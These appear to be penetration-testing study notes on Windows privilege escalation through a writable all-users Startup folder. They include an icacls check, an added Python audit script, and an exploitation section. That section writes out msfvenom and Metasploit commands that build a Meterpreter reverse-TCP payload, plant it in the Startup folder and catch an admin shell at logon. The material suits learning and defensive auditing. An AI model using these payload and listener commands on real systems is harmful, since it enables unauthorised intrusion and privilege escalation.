This is something PowerUp misses!!
It is niche and you probably won't see it, but it is nice to know in case it's literally the only path.
We use icacls (pronounced "eye cackles").
Windows CMD:
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
We look for a user group with full access, shown as '(F)', to the directory.
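To audit for the same condition, this added example (not part of the original notes) parses icacls output and lists principals outside an assumed trusted set that hold write-capable rights on the folder. It goes beyond the (F) case above to cover M, W and specific rights such as WD; the sample output, the TRUSTED set and the function names are constructed for illustration.

```python
import re

# icacls inheritance flags; any other parenthesised group is a rights mask.
FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Simple and specific rights that allow adding a file to the folder.
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD"}
# Assumption: principals expected to hold write access here.
TRUSTED = {"nt authority\\system", "builtin\\administrators",
           "nt service\\trustedinstaller"}
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<groups>(?:\([^)]+\))+)$")

def parse_icacls(path, output):
    """Return [(principal, flags, rights)] for each ACE icacls printed for path."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()  # first ACE shares a line with the path
        m = ACE_RE.match(line)
        if not m:
            continue  # blank line or the "Successfully processed" summary
        groups = re.findall(r"\(([^)]+)\)", m.group("groups"))
        flags = {g for g in groups if g in FLAGS or g == "DENY"}
        rights = {r for g in groups if g not in flags for r in g.split(",")}
        aces.append((m.group("who"), flags, rights))
    return aces

def risky_writers(path, output):
    """Untrusted principals whose allow ACE on the folder itself permits writes."""
    found = {}
    for who, flags, rights in parse_icacls(path, output):
        if "DENY" in flags or "IO" in flags or who.lower() in TRUSTED:
            continue  # deny ACE, inherit-only ACE, or expected writer
        hit = rights & WRITE_RIGHTS
        if hit:
            found.setdefault(who, set()).update(hit)
    return found

STARTUP = r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
# Constructed sample output, not captured from a real host.
SAMPLE = STARTUP + r""" BUILTIN\Users:(F)
    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
    BUILTIN\Administrators:(I)(OI)(CI)(F)
    BUILTIN\Users:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    print(risky_writers(STARTUP, SAMPLE))
```

Any principal it reports on the all-users Startup folder is a finding to fix by removing that ACE, since files placed there run at logon for every user.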
Exploitation:
Make y.exe and set up the Meterpreter listener again:
In Kali:
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost tun0
run
In another Terminal:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 -f exe -o y.exe
Move the file to the Startup folder on the Windows machine:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
If you can't see ProgramData, just type it in the address bar.
Log off.
Log in with the admin account creds.
In Kali:
Find the Meterpreter session that was created and type:
getuid
It should be the admin.